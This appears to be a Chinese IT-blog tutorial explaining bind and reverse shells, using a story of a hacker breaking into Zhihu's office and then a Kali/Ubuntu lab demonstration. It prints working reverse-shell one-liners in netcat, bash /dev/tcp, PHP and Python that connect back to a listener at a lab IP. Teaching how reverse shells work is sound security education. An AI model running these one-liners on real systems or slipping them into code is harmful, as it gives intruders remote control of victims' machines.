百度360必应搜狗淘宝本站头条
当前位置:网站首页 > IT知识 > 正文

3分钟搞懂反弹shell

liuian 2024-12-02 22:29 34 浏览

实际上,很早很早以前就听说过反弹shell,我最早做的网络安全实验就开始反弹shell。比如这个知乎live中的第三个实验TCP会话劫持,就反弹了shell。一年前在与攻防团队的交流会上,再次听到反弹shell,当时也没放在心上,反正挺重要的。直到今天,才算彻底明白反弹shell是咋回事。如果用一句话概述,那么反弹shell就是:

黑客控制了目标,弹一个shell,构建一个稳定的通信后门。


【网络安全】TCP-IP协议攻击 作者 ailx10


  • 先弹shell就是正向shell,后连接
  • 后弹shell就是反向shell,先监听

正向shell:客户端想要获得服务端的shell

  • 假设小黑是一名黑客
  • 他悄咪咪溜进了知乎总部大楼,发现一台刘看山的电脑,但是刘看山出门了
  • 于是小黑通过nc将这台电脑的控制权通过23333端口发射出去
  • 小黑做了一系列的操作,又悄咪咪的原路返航
  • 回到家后,通过nc连上刘看山的电脑
  • 后来,刘看山的隐私泄露了~
  • (这里小黑是客户端,刘看山是服务端,服务端发射shell)

反向shell:服务端想要获得客户端的shell(也就是反弹shell)

  • 假设小黑是一名黑客
  • 他悄咪咪溜进了知乎总部大楼,发现一台刘看山的电脑,但是刘看山出门了
  • 小黑发现电脑里有一个有趣的文件(刘看山的秘密)
  • 小黑下载这个文件到自己的U盘里,又悄咪咪的原路返航
  • 回到家后,小黑打开这个文件
  • 发现电脑被刘看山控制了~
  • (这里小黑是客户端,刘看山是服务端,客户端发射shell)

正向shell(服务端送shell)

  • 第一步:在kali rolling(服务端)上监听23333端口,并反弹shell
nc -lvp 23333 -e /bin/sh
  • 第二步:在ubuntu18(客户端)上连接kali rolling的23333端口
  • 这个时候,客户端就拿到服务端的shell控制权了
  • 可以随意控制服务端
nc 192.168.160.140 23333

反向shell(客户端送shell)

  • 第一步:在ubuntu18上选择增强版的netcat
  • 一般ubuntu默认的是free-bsd版本的nc
update-alternatives --config nc
  • 第二步:在kali rolling上启动服务端,等待客户端上钩
  • 客户端只要吃钩子,服务端就获得了客户端的shell控制权
  • 可以随意控制客户端
nc -lvp 23333
  • 第三步:在ubuntu18上启动客户端,吃钩子
nc 192.168.160.140 23333 -e /bin/sh
  • 我们发现必须客户端和服务端都安装了nc才能实现反弹shell(反向shell)
  • 但是如果其中一方没有安装nc怎么办?

bash反弹shell

  • 服务端(kali rolling上监听23333)
  • 客户端吃钩子,服务端就成功控制客户端了
  • 客户端(ubuntu18上bash反弹shell)
bash -i >& /dev/tcp/192.168.160.140/23333 0>&1

php反弹shell

  • 服务端(kali rolling上监听23333)
  • 客户端吃钩子,服务端就成功控制客户端了
  • 客户端(ubuntu18上bash反弹shell)
php -r '$f=fsockopen("192.168.160.140",23333);exec("/bin/sh -i <&3 >&3 2>&3");'

python反弹shell

  • 服务端(kali rolling上监听23333)
  • 客户端吃钩子,服务端就成功控制客户端了
  • 客户端(ubuntu18上bash反弹shell)
python -c 'import socket,subprocess,os; \
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.160.140",23333));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'

本篇完~

相关推荐

eino v0.4.5版本深度解析:接口类型处理优化与错误机制全面升级

近日,eino框架发布了v0.4.5版本,该版本在错误处理、类型安全、流处理机制以及代理配置注释等方面进行了多项优化与修复。本次更新共包含6个提交,涉及10个文件的修改,由2位贡献者共同完成。本文将详...

SpringBoot异常处理_springboot异常注解

在SpringBoot中,异常处理是构建健壮、可维护Web应用的关键部分。良好的异常处理机制可以统一返回格式、提升用户体验、便于调试和监控。以下是SpringBoot中处理异常的完整指...

Jenkins运维之路(Jenkins流水线改造Day02-1-容器项目)

这回对线上容器服务器的流水线进行了一定的改造来满足目前线上的需求,还是会将所有的自动化脚本都放置到代码库中统一管理,我感觉一章不一定写的完,所以先给标题加了个-1,话不多说开干1.本次流水线的流程设计...

告别宕机!零基础搭建服务器监控告警系统!小白也能学会!

前言本文将带你从零开始,一步步搭建一个完整的服务器指标监控与邮件告警系统,使用的技术栈均为业界主流、稳定可靠的开源工具:Prometheus:云原生时代的监控王者,擅长指标采集与告警规则定义Node_...

httprunner实战接口测试笔记,拿走不谢

每天进步一点点,关注我们哦,每天分享测试技术文章本文章出自【码同学软件测试】码同学公众号:自动化软件测试码同学抖音号:小码哥聊软件测试01开始安装跟创建项目pipinstallhttprunne...

基于JMeter的性能压测平台实现_jmeter压测方案

这篇文章已经是两年前写的,短短两年时间,JMeter开源应用技术的发展已经是翻天覆地,最初由github开源项目zyanycall/stressTestPlatform形成的这款测试工具也开始慢...

12K+ Star!新一代的开源持续测试工具!

大家好,我是Java陈序员。在企业软件研发的持续交付流程中,测试环节往往是影响效率的关键瓶颈,用例管理混乱、接口调试复杂、团队协作不畅、与DevOps流程脱节等问题都能影响软件交付。今天,给大家...

Spring Boot3 中分库分表之后如何合并查询

在当今互联网应用飞速发展的时代,数据量呈爆发式增长。对于互联网软件开发人员而言,如何高效管理和查询海量数据成为了一项关键挑战。分库分表技术应运而生,它能有效缓解单库单表数据量过大带来的性能瓶颈。而在...

离线在docker镜像方式部署ragflow0.17.2

经常项目上会出现不能连外网的情况,要怎么使用ragflow镜像部署呢,这里提供详细的步骤。1、下载基础镜像根据docker-compose-base.yml及docker-compose.yml中的i...

看,教你手写一个最简单的SpringBoot Starter

何为Starter?想必大家都使用过SpringBoot,在SpringBoot项目中,使用最多的无非就是各种各样的Starter了。那何为Starter呢?你可以理解为一个可拔插式...

《群星stellaris》军事基地跳出怎么办?解决方法一览

《群星stellaris》军事基地跳出情况有些小伙伴出现过这种情况,究竟该怎么解决呢?玩家“gmjdadk”分享的自己的解决方法,看看能不能解决。我用英文原版、德语、法语和俄语四个版本对比了一下,结果...

数据开发工具dbt手拉手教程-03.定义数据源模型

本章节介绍在dbt项目中,如何定义数据源模型。定义并引入数据源通过Extract和Load方式加载到仓库中的数据,可以使用dbt中的sources组件进行定义和描述。通过在dbt中将这些数据集(表)声...

docker compose 常用命令手册_docker-compose init

以下是DockerCompose常用命令手册,按生命周期管理、服务运维、构建配置、扩缩容、调试工具分类,附带参数解析、示例和关键说明,覆盖多容器编排核心场景:一、生命周期管理(核心命令...

RagFlow与DeepSeek R1本地知识库搭建详细步骤及代码实现

一、环境准备硬件要求独立显卡(建议NVIDIAGPU,8GB显存以上)内存16GB以上,推荐32GB(处理大规模文档时更高效)SSD硬盘(加速文档解析与检索)软件安装bash#必装组件Docker...

Docker Compose 配置更新指南_docker-compose配置

高效管理容器配置变更的最佳实践方法重启范围保留数据卷适用场景docker-composeup-d变更的服务常规配置更新--force-recreate指定/所有服务强制重建down→up流程...